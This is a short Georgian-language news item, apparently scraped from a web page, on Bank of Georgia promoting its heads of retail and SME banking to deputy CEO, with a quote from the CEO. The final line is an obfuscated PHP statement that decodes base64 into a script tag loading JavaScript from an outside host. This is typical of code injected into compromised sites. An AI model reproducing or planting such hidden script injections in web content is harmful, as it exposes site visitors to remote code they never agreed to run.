celsiusi
ავერსი შნაიდერი

 

ნუცა გოგილაშვილი - საცალო ბანკინგის ხელმძღვანელი და ზურაბ მასურაშვილი - მცირე და საშუალო ბიზნესის ბანკინგის ხელმძღვანელი, აღმასრულებელი დირექტორის მოადგილეებად დაწინაურდებიან. ამასთან, ამ საკადრო ცვლილებას რეგულატორული ნებართვა ესაჭიროება.

“საქართველოს ბანკის” აღმასრულებელმა დირექტორმა არჩილ გაჩეჩილაძემ დაწინაურებებთან დაკავშირებით კომენტარი გააკეთა:

"მოხარული ვარ, გამოვაცხადო ზურაბ მასურაშვილისა და ნუცა გოგილაშვილის დაწინაურება. ზურაბის და ნუცას მიერ გაწეული სამუშაო უკანასკნელ წლებში “საქართველოს ბანკის” წარმატების ერთ-ერთი წამყვანი მიზეზი იყო.

ზურაბმა გარდაქმნა ის, თუ როგორ აწარმოებს “საქართველოს ბანკი” მცირე და საშუალო ბიზნესის დაკრედიტებას. ნუცამ კი მომხმარებელზე ორიენტირებული სერვისისა და ადამიანური კაპიტალის მართვის ახალი სტრატეგია შეიმუშავა, რაც ორივე მიმართულებით გაუმჯობესებულ მაჩვენებელში აისახა. ნუცა საცალო ბანკინგის სეგმენტს ხელმძღვანელობს.

იმედი მაქვს, რომ ნუცა და ზურაბი გააძლიერებენ ჩვენს მენეჯმენტის გუნდს და ამ გზით ორგანიზაციის შემდგომ წარმატებაში გააგრძელებენ წვლილის შეტანას,”- განაცხადა არჩილ გაჩეჩილაძემ.

715
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");